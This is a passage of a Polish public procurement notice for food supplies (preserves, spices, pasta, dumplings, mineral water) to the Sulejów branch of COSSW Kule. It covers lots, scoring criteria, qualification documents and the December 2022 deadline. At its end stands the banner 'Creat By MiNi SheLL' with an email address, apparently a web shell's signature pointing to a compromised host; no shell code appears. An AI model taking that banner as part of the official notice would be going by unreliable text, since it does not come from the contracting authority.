1040,00<br/>21	Sałatka szwedzka	15331500-2	kg	150,00<br/>22	Sałatka wielowarzywna	15331500-2	kg	150,00<br/>23	Sałatka obiadowa	15331500-2	kg	150,00<br/>24	Kapusta czerwona konserwowa	15331500-2	kg	150,00<br/>25	Sałatka z buraczków	15331500-2	kg	200,00<br/>26	Ćwikła z chrzanem	15331500-2	kg	90,00<br/>27	Jabłka prażone	15332140-7	kg	70,00<br/>28	Galaretka	15332240-8	kg	50,00<br/>29	Dżem niskosłodzony	15332290-3	kg	500,00<br/>30	Ananas w syropie	15332400-8	kg	180,00<br/>31	Brzoskwinie w syropie	15332400-8	kg	150,00<br/>32	Śliwki suszone kalifornijskie	15332410-1	kg	30,00<br/>33	Olej 15411100-3	l	600,00<br/>34	Budyń	15550000-8	kg	50,00<br/>35	Ryż paraboliczny	15614100-6	kg	150,00<br/>36	Ryż biały	15614100-6	kg	90,00<br/>37	Mąka pszenna	15612100-2	kg	220,00<br/>38	Kasza jęczmienna pęczak	15613000-8	kg	120,00<br/>39	Kasza jęczmienna	15613000-8	kg	25,00<br/>40	Kasza gryczana	15613000-8	kg	80,00<br/>41	Płatki czekoladowe	15613311-1	kg	120,00<br/>42	Płatki kukurydziane	15613311-1	kg	120,00<br/>43	Mąka ziemniaczana	15623000-1	kg	60,00<br/>44	Żelatyna spożywcza	15890000-3	kg	10,00<br/>45	Kwasek cytrynowy	15800000-6	kg	3,00<br/>46	Groszek ptysiowy 15820000-2	kg	35,00<br/>47	Rogal z nadzieniem 15820000-2	kg	100,00<br/>48	Grzanki	15821000-9	kg	100,00<br/>49	Cukier waniliowy	15830000-5	kg	2,00<br/>50	Cukier 15831200-4	kg	1600,00<br/>51	Miód porcjowany 15831600-8	kg	10,00<br/>52	Napój kakaowy	15841000-5	kg	3,00<br/>53	Krem czekoladowy	15842200-4	kg	15,00<br/>54	Wafelek w czekoladzie	15842220-0	kg	100,00<br/>55	Baton czekoladowy z karmelem	15842220-0	kg	116,00<br/>56	Makaron pióra	15851100-9	kg	115,00<br/>57	Makaron nitki	15851100-9	kg	110,00<br/>58	Makaron świderki	15851100-9	kg	160,00<br/>59	Makaron wstęgi 15851100-9	kg	100,00<br/>60	Makaron kokardki	15851100-9	kg	100,00<br/>61	Zacierki	15851100-9	kg	11,00<br/>62	Kawa rozpuszczalna	15861000-1	kg	10,00<br/>63	Kawa naturalna	15861100-2	kg	0,50<br/>64	Herbata expresowa	15864100-3	kg	120,00<br/>65	Liść laurowy	15870000-7	kg	2,00<br/>66	Majeranek	15870000-7	kg	4,00<br/>67	Papryka słodka	15870000-7	kg	2,00<br/>68	Papryka ostra	15870000-7	kg	1,00<br/>69	Ziele angielskie 15870000-7	kg	2,00<br/>70	Przyprawa curry	15870000-7	kg	3,00<br/>71	Kurkuma	15870000-7	kg	1,00<br/>72	Ocet 15871100-5	l	40,00<br/>73	Ketchup	15871230-5	kg	160,00<br/>74	Musztarda delikatesowa stołowa	15871250-1	kg	90,00<br/>75	Przyprawa warzywna do potraw 15871270-7	kg	85,00<br/>76	Delikata do ryb	15871270-7	kg	1,00<br/>77	Delikata do kurczaka	15871270-7	kg	4,00<br/>78	Przyprawa do karczku	15871270-7	kg	3,00<br/>79	Przyprawa do wołowiny	15871270-7	kg	2,00<br/>80	Majonez dekoracyjny	15871273-8	l	400,00<br/>81	Gałka muszkatołowa	15872000-1	kg	1,00<br/>82	Cynamon	15872000-1	kg	1,50<br/>83	Pieprz czarny mielony	15872100-2	kg	6,00<br/>84	Pieprz czarny ziarnisty 15872100-2	kg	5,00<br/>85	Pieprz ziołowy	15872100-2	kg	4,00<br/>86	Pieprz kolorowy ziarnisty	15872100-2	kg	3,00<br/>87	Tymianek	15872300-4	kg	0,50<br/>88	Rozmaryn	15872300-4	kg	0,50<br/>89	Zioła prowansalskie	15872300-4	kg	0,30<br/>90	Bazylia	15872300-4	kg	0,30<br/>91	Oregano	15872300-4	kg	0,30<br/>92	Sól 15872400-5	kg	240,00<br/>93	Imbir	15872500-6	kg	1,00<br/>94	Żurek w płynie	15891000-0	l	200,00<br/>95	Przyprawa do zup ,sosów i sałatek	15891500-5	kg	200,00<br/>96	Sosy sałatkowe 15871200-6	kg	10<br/>97	Sos z zielonym pieprzem 15871260-4	kg	7<br/>98	Sos do makaronu Carbonara 15871260-4	kg	3<br/>99	Sos do makaronu Bolognese 15871260-4	kg	16<br/>100	Barszcz biały 15891400-4	kg	30<br/>101	Zupa pieczarkowa 15891400-4	kg	8<br/>102	Zupa brokułowa 15891400-4	kg	8<br/>103	Zupa cebulowa	15891400-4	kg	8<br/>104	Krem z borowików 15891400-4	kg	8<br/>105	Bulion drobiowy 15891500-5	kg	10<br/>106	Bulion wołowy 15891500-5	kg	10<br/>107	Naturalna woda mineralna niegazowana/ gazowana 0,50 litra	15981000-8	litr	600<br/>108	Naturalna woda mineralna niegazowana/gazowana 1,50 litra	15981000-8	litr	15000<br/>109	Napoje owocowe 15982000-5	litr	500<br/><br/>Szczegółowe informacje dotyczące przedmiotu zamówienia zawiera załącznik nr 5a do SIWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15981000-8 - Wody mineralne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15891500-5 - Buliony</p> <p class="mb-0">15871273-8 - Majonez</p> <p class="mb-0">15851100-9 - Makaron niegotowany</p> <p class="mb-0">15613311-1 - Płatki kukurydziane</p> <p class="mb-0">15411100-3 - Olej roślinny</p> <p class="mb-0">15332290-3 - Dżemy</p> <p class="mb-0">15331500-2 - Warzywa konserwowane w occie</p> <p class="mb-0">15131000-5 - Konserwy i przetwory z mięsa</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca najkorzystniejszy bilans punktów w kryteriach:<br/>1) „Łączna cena ofertowa brutto” – C;<br/>2) „Czas wymiany wadliwego towaru, uzupełnienia towaru ” – W;<br/>Całkowita liczba punktów, jaką otrzyma dana oferta, zostanie obliczona według poniższego wzoru:<br/>L = C + W<br/>gdzie:<br/>L – całkowita liczba punktów,<br/>C – punkty uzyskane w kryterium „Łączna cena ofertowa brutto”,<br/>W – punkty uzyskane w kryterium „Czas wymiany wadliwego towaru, uzupełnienia towaru”,<br/>Jeżeli Wykonawca nie określi czasu wymiany/uzupełnienia towaru, to Zamawiający przyjmie, że Wykonawca zaoferował czas powyżej 24 godzin.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas wymiany wadliwego towaru, uzupełnienia towaru</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia na część nr 3 - dostawy produktów mącznych dla COSSW w Kulach Oddział Zamiejscowy w Sulejowie <br/>CPV: 15851000- 8<br/>l.p.	Nazwa artykułu	Kod CPV	J.m.	Ilość<br/>1	Pierogi z serem	15851000- 8	kg	280<br/>2	Pierogi z mięsem	15851000- 8	kg	280<br/>3	Kopytka	15851000- 8	kg	180<br/>4	Krokiety	15851000- 8	kg	280<br/>5	Naleśniki z owocami	15851000- 8	kg	280<br/>6	Naleśniki z serem	15851000- 8	kg	500<br/>7	Kluski śląskie	15851000- 8	kg	180<br/>8	Kartacze z mięsem	15851000- 8	kg	48<br/>9	Pyzy z mięsem	15851000- 8	kg	190<br/>10	Knedle	15851000- 8	kg	60 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15851000-8 - Produkty mączne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca najkorzystniejszy bilans punktów w kryteriach:<br/>1) „Łączna cena ofertowa brutto” – C;<br/>2) „Czas wymiany wadliwego towaru, uzupełnienia towaru ” – W;<br/>Całkowita liczba punktów, jaką otrzyma dana oferta, zostanie obliczona według poniższego wzoru:<br/>L = C + W<br/>gdzie:<br/>L – całkowita liczba punktów,<br/>C – punkty uzyskane w kryterium „Łączna cena ofertowa brutto”,<br/>W – punkty uzyskane w kryterium „Czas wymiany wadliwego towaru, uzupełnienia towaru”,<br/>Jeżeli Wykonawca nie określi czasu wymiany/uzupełnienia towaru, to Zamawiający przyjmie, że Wykonawca zaoferował czas powyżej 24 godzin.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas wymiany wadliwego towaru, uzupełnienia towaru</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Zgodnie z art. 274 ust. 1 ustawy Pzp, Zamawiający wezwie wykonawcę, którego oferta zostanie najwyżej oceniona do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, tj.: <br/>1.2 w zakresie braku podstaw wykluczenia:<br/>1) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 109 ust. 1 pkt 4 ustawy Pzp, z zastrzeżeniem pkt 2 niniejszego rozdziału;<br/>w przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia ww. dokument składa każdy z tych Wykonawców;<br/>2) Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, to zgodnie z § 4 ust 1 pkt 3 lit. b rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. poz. 2415), zamiast odpisu albo informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury.<br/>UWAGA: Dokumenty, o których mowa w pkt 1.2, powinny być wystawione nie wcześniej niż 3 miesiące przed ich złożeniem.<br/>2. Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne, o ile wykonawca wskazał w oświadczeniu z art. 125 dane umożliwiające dostęp do tych środków. Wykonawca składa podmiotowe środki dowodowe aktualne na dzień ich złożenia.<br/>3. Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które Zamawiający posiada, jeżeli wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i aktualność. <br/>4. Podmiotowe środki dowodowe oraz inne dokumenty lub oświadczenia należy przekazać Zamawiającemu przy użyciu środków komunikacji elektronicznej dopuszczonych w SWZ, w zakresie i sposób określony w przepisach rozporządzenia wydanego na podstawie art. 70 PZP. Podmiotowe środki dowodowe sporządzone w języku obcym muszą być złożone wraz z tłumaczeniem na język polski.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Formularz ofertowy.<br/>Formularz cenowy w zakresie części 1 do 3. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.Wykonawcy wspólnie ubiegający się o zamówienie: <br/>1) ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązania; <br/>2) zobowiązani są do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia; <br/>3) pełnomocnictwo musi wynikać z umowy lub z innej czynności prawnej, mieć formę pisemną, zaś fakt ustanowienia pełnomocnictwa musi wynikać z załączonych do oferty dokumentów; <br/>4) pełnomocnictwo składa się w formie określonej w Rozdziale IX ust. 7 SWZ. <br/>2. Jeżeli oferta Wykonawców wspólnie ubiegających się o zamówienie zostanie wybrana jako najkorzystniejsza, Zamawiający może przed zawarciem umowy żądać przedstawienia w określonym terminie umowy regulującej współpracę tych Wykonawców. <br/>3. Zamawiający nie zastrzega obowiązku osobistego wykonania przez Wykonawcę kluczowych części zamówienia. <br/>4. Wykonawca może powierzyć wykonanie części zamówienia podwykonawcom pod warunkiem, że posiadają oni uprawnienia do ich wykonania. Wykonanie zamówienia przez podwykonawcę nie zwalnia Wykonawcy z odpowiedzialności za należyte wykonanie zamówienia oraz z odpowiedzialności za wykonanie obowiązków wynikających z umowy i obowiązujących przepisów prawa. Wykonawca odpowiada za działania i zaniechania podwykonawców jak za własne. <br/>5. Zamawiający żąda aby Wykonawca, który zamierza powierzyć wykonanie części zamówienia podwykonawcom, podał taką informację w formularzu oferty wraz ze wskazaniem zakresu zamówienia, jaki zamierza powierzyć podwykonawcom oraz nazw podwykonawców, o ile są znane na etapie składania ofert. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Informacje w tym zakresie zostały opisane w załączniku nr 4 do SWZ Projekt umowy par. 11. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-12-15 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem formularza do złożenia, zmiany wycofania oferty lub wniosku dostępnego na ePUAP i udostępnionego również na miniPortalu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-12-15 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com